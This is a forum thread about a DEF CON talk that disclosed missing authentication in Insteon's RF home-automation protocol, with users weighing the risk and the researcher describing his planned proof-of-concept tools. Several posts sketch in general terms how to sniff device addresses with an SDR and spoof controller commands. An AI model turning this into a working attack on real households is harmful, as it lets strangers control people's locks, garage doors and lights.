Jump to content

This could be bad...


ngeren

Recommended Posts

Posted (edited)

Apparently some major security flaws are about to be released regarding Insteon's protocol.

 

https://defcon.org/html/defcon-23/dc-23-speakers.html#Shipley

 

Yes, EVIL Pete indicated this in the Smarthome forum several weeks ago. I am eager to see what has been found and what methods are used to exploit the Insteon protocol.

 

Not too sure how Smartlabs will respond to this news . . .

 

But, if history is any measure or indicator they (Smartlabs) will sit and wait for a year or so before they provide any kind of resolution. This was seen in the HUB v1 a few years ago and was documented in the Cisco site as to the threat level etc. For me I am not worried at all about a hacker trying to control and access my Insteon network.

 

Given the extremely short distances of RF / Power line signalling. The odds of someone outside in a vehicle lying in wait to capture the Insteon signal is highly remote. Bolster this with the shear fact I am surrounded by red necks and low tech fools that simply decreases the odds anyone is interested in hacking my lighting system.

 

Don't get me wrong, if EVIL Pete provides methods and techniques that compromise the Insteon architecture Smartlabs needs to plug those holes etc.

 

For me I won't lose any sleep over this because there is a higher possibility of me getting struck by a meteor in this hick town than some random person coming down my street waiting to capture and turn on/off my lights. 

Edited by Teken
Posted

I've seen this boast a few times from various posters on various forums, "I will be presenting my research, and releasing tools demonstrating the vulnerabilities throughout the Insteon home automation system," but not yet any evidence of any presentation.

Posted

As Teken pointed out, it's going to be quite rare that someone would target a house that has an Insteon network. They'd have to be on my physical property in order to get a signal, which means I'd see them on my video surveillance. I don't have any red necks but I have a lot of old seniors with their oxygen tanks. I doubt they even have a cell phone (maybe a jitterbug), so that doesn't worry me.

 

I don't use insteom for any security related actions. I use a DSC alarm, all hardwired.

Posted

 

 

"For me I won't lose any sleep over this because there is a higher possibility of me getting struck by a meteor in this hick town than some random person coming down my street waiting to capture and turn on/off my lights. "

 

You say that now, but wait till a redneck makes your lights start strobing at 2am!

(YouTube-Hayseed Dixie)

 

 

GT

Posted

I've seen this boast a few times from various posters on various forums, "I will be presenting my research, and releasing tools demonstrating the vulnerabilities throughout the Insteon home automation system," but not yet any evidence of any presentation.

Thanks Stu. This kind of report is as tiresome as it is old. I understand the basis / model. I have been Looking for a real exploit recreate or actual evidence of a breach to evaluate.

 

 

Sent from my iPhone using Tapatalk

Posted

Well for perspective I don't think anyone had the same skill set as EVIL Pete.

 

Considering this is what he does as a hobby and related work. Keeping in mind not one soul has ever been a presenter at DEFCON so this lends credence to what has been stated.

 

At the end of the day I don't believe he's just blowing smoke up your dress!

 

 

Ideals are peaceful - History is violent

Posted

Certainly not doubting anyone's skill, but what is presented here is 100% scare and 0% evidence.  If the work is so compelling, why not wait and publish with the evidence?  

 

So far, there is the potential to get people concerned about things that can't be seen or evaluated.

 

 

 

Posted (edited)

Certainly not doubting anyone's skill, but what is presented here is 100% scare and 0% evidence.  If the work is so compelling, why not wait and publish with the evidence?  

 

So far, there is the potential to get people concerned about things that can't be seen or evaluated.

 

 

True, but I saw it as informational data that he wanted to offer the general public. I don't pretend to know his underlying intent or purpose. But, its safe to say given his past history its a combination of tinkering and finding exploits to help people and companies be aware and ultimately improve their products and security attributes.

 

I am more curious as to what hardware / software is being used to cause this exploit to be seen. As I have often seen people use things that the *Average Person* really had no capability to mimic or copy to do the same.

 

Case in point ELA has made his ELAM which assists him in monitoring every aspect of the Insteon protocol and line traffic along with signal strength. Given the fact his skills are very high and is a EE this does not come as a surprise to me in the least.

 

What does surprise me is Smartlabs in ability to offer the same?

 

You're talking about people who are intimately aware and have all the technical know how of the Insteon protocol and more. Yet you have some random person like ELA & EVIL Pete who have summarily been able to obtain more and provide more data than any single Smartlabs engineer in the history of the product?

 

What is wrong with this picture???

Edited by Teken
Posted (edited)

I believe I've been pretty evangelical about NOT using Insteon for access control or life safety systems because I myself have been able to 'hack' my own system. All that's needed to take it to the next level is a SDR, listen for wireless Insteon signals, learn the addresses in a given installation and then start messing with link tables, turning devices on and off etc. No authentication at all.

 

I'm sure you've all noticed that you can add a wired device to the plm link table without pressing any button on the device.... How do you think that works? By sniffing, its easy to learn the plm address and then send signals that 'appear' to be from the plm to any device to control it.

 

Smarthome could have extreme liability for selling the iolinc as a garage door solution.

 

Zwave does not have this issue because you must have physical access to the device.

Edited by MWareman
Posted (edited)

I believe I've been pretty evangelical about NOT using Insteon for access control or life safety systems because I myself have been able to 'hack' my own system. All that's needed to take it to the next level is a SDR, listen for wireless Insteon signals, learn the addresses in a given installation and then start messing with link tables, turning devices on and off etc. No authentication at all.

 

I'm sure you've all noticed that you can add a wired device to the plm link table without pressing any button on the device.... How do you think that works? By sniffing, its easy to learn the plm address and then send signals that 'appear' to be from the plm to any device to control it.

 

Smarthome could have extreme liability for selling the iolinc as a garage door solution.

 

Zwave does not have this issue because you must have physical access to the device.

 

I think some of the fault lies with the general public to be honest and not all of the blame can land on Smartlabs. In this day and age all of us want our cake and eat it too. This often times leads to a compromise in security or to the basic elements of the system.

 

Any person can walk into a office building and find best practices with respect to security not being followed. Whether it be using strong passwords, not allowing recycling of similar ones, to expiring them on a known interval. Many places still do not use any kind of two form authentication or challenge phrase passwords.

 

Many of the places I supported used all of the above and much more such as biometrics, random number generators used as a 3rd (in person) authentication etc. Some of the other military and bio medical facilities use face recognition, palm print, and retina detection for level 4 areas and beyond.

 

At the end of the day if we all could accept the fact the device had to be physically pressed to send out its MAC address while encrypted enroute there would be very little to worry about. But the reality is *we the people* have asked to make the enrollment easier and faster so this is what we are left with.

 

Again, I see what EVIL Pete as doing ,is for the benefit of the product, people, and the hardware. For ever and a day those using Mac computers have believed they were impervious to exploits, virus's, and trojans, etc.

 

Fast forward the last five years there are more each day that exploit the Mac OS. The reality is the Mac had a market share of less than 2% globally and nobody who was hacking at the time wanted to waste resources in something that had zero impact to the global market place.

 

Now, given the mass adoption rate and growth of the Apple product line in all manner of business, government, and public use. That 2% target has outpaced the PC industry by 300% YOY.

 

To a hacker there is now a reason, and ROI for spending time to find and exploit known holes in the Unix / Linux kernal. For me if EVIL Pete finds something that truly exploits the Insteon hardware that is a good thing. As this will make future hardware that much better in the long run.

 

The biggest concern people should have is the slow aszz response time Smartlabs will have. Let alone the wall of silence and the lack of time line to correct said issue(s). 

Edited by Teken
Posted

Like most here, I'm not too worried about anything worse than inconvenience from this., because I'm not relying on it for safety or security. But I expect companies who make IoT devices to have network security at the very top of their priorities list.

 

 

Sent from my iPad using Tapatalk

Posted

I'm sure Insteon's lawyers have already reached out to EVIL Pete in order for a fix before this information goes public. Security concerns can be detrimental for a business and the consumers so I wouldn't doubt if Insteon is doing everything possible to keep this from going public. Possibly why there is no proof of concept yet...

Posted (edited)

Thanks Stu. This kind of report is as tiresome as it is old. I understand the basis / model. I have been Looking for a real exploit recreate or actual evidence of a breach to evaluate.

 

 

Sent from my iPhone using Tapatalk

Why hack the Insteon signals when you can hack the ISY for a lot more fun? Imagine the cool programs you could set up for a joke!

 

Check the thumbnail pic.

http://forum.universal-devices.com/topic/12599-anonymous-hackedattacked-isy/?hl=hacked

Edited by larryllix
Posted

Sure. Expected for any device where it was too much trouble to change the admin/admin credentials as instructed.

 

 

Sent from my iPhone using Tapatalk

Guest Digger
Posted

It only takes one class action lawsuit to hurt a company.  If there is a vulnerability that can be exploited some lawyer will want to profit from it. 

 

Maybe this is a reason why there are no Insteon Locks. 

Posted

Maybe this is a reason why there are no Insteon Locks. 

 

There's an Insteon device that interfaces with MI locks.

Posted (edited)

I'll have the code up in a day or so now that I'm back from defcon.

 

Effectively Insteon's documentation for their RF protocol is bullshit and not even close to what is really used.

 

I've reverse engineered the actual protocol, documented it, and wrote proof of concept set of tools.

 

These tools consist of a few programs & scripts to allow anyone to intercept and/or transmit commands effectively circumventing Insteon's security model of needing to know the node address or being paired.

 

With a good antenna Insteon devices can be communicated with at a fair distance.

 

The security risk for the end user obviously depend on what you use Insteon for. if you have just lights, your threat profile is minimal.

 

I would not advise connecting locks or alarm systems as Insteon is showing to be the weakest link in the chain

Edited by evilpete
Posted

I'll have the code up in a day or so now that I'm back from defcon.

 

Effectively Insteon's documentation for their RF protocol is bullshit and not even close to what is really used.

 

I've reverse engineered the actual protocol, documented it, and wrote proof of concept set of tools.

 

These tools consist of a few programs & scripts to allow anyone to intercept and/or transmit commands effectively circumventing Insteon's security model of needing to know the node address or being paired.

 

With a good antenna Insteon devices can be communicated with at a fair distance.

 

EVIL Pete,

 

For the benefit of others will you be able to offer a video presentation of this interception and control of the Insteon device via RF? Also, can you provide some clarity as to the over all intent and back ground as to why you took this project up besides novel curiosity?

 

I think many people who don't know you would appreciate some back ground and insight along with a little more detail(s) as to what is happening exactly.

 

Lastly, have you been contacted by Smartlabs / Smarthome about these findings?

Posted

EVIL Pete,

 

For the benefit of others will you be able to offer a video presentation of this interception and control of the Insteon device via RF? Also, can you provide some clarity as to the over all intent and back ground as to why you took this project up besides novel curiosity?

 

Defcon will be uploading the video in the next few weeks, it is not one of my better talks. I was not as animated as I would have liked.

 

I took on this project after trying to implement the RF protocol as documented in their ”white paper” with a toolkit called rfcat and having it not work. In the process of debugging I discovered the gross inaccurately of the published documentation.

Posted

Certainly not doubting anyone's skill, but what is presented here is 100% scare and 0% evidence.  If the work is so compelling, why not wait and publish with the evidence?  

 

So far, there is the potential to get people concerned about things that can't be seen or evaluated.

 

the reason the code was not pre-released was because while writing it I effectively beat it with a sledge hammer till it worked for me.

 

Given I have kids and a day job I have not had time to clean it up as much as I would like. I also wrote my own software FSK demodulator in the process as an exercise.

 

I'll be posting the code on my github account some time this week and I have plans to eventually make the tools more genetic for use with other RF protocols.

 

Maybe someone will take what I've started and write a software based PLM...

Posted

We all have different pressures on our lives, me too.

 

Good luck and I hope you accomplish your goals.

 

 

Sent from my iPhone using Tapatalk

Posted

the reason the code was not pre-released was because while writing it I effectively beat it with a sledge hammer till it worked for me.

 

Given I have kids and a day job I have not had time to clean it up as much as I would like. I also wrote my own software FSK demodulator in the process as an exercise.

 

I'll be posting the code on my github account some time this week and I have plans to eventually make the tools more genetic for use with other RF protocols.

 

Maybe someone will take what I've started and write a software based PLM...

 

Well, this last statement just peaked my interest! One can only hope and pray this is something a developer could accomplish but don't see this ever coming to light in a commercial way.

 

Its one thing to do this as a private developer and doing this on the DL. But, we all know Smartlabs would never allow this from happening or even coming into market.

 

But, lets just for a moment say some ingenious person was to *mistakenly* leak such a software PLM application which did not rely on actual hardware. The problem is how does one supply the power line / RF signaling to interact with Insteon hardware?

 

This would either require a person obtaining the Insteon processing chip which I have never heard any 3rd party accomplish save Broan, Smartinet, SkyLink, and Flood Stop.

 

I suppose anyone could just repurpose an existing chip from a unit and then go to town. Just spit balling here so curious how some of you feel this could be accomplished with as little investment / hardware etc. 

Posted

It can be done easily with the cc1111emk USB dongle.

 

I already have Python scripts that allow you to send commands in hex similar to the raw PLM interface.

 

Wrapping this as a network service making and presenting a PLM like interface over TCP would be straight forward.

Guest
This topic is now closed to further replies.

×
×
  • Create New...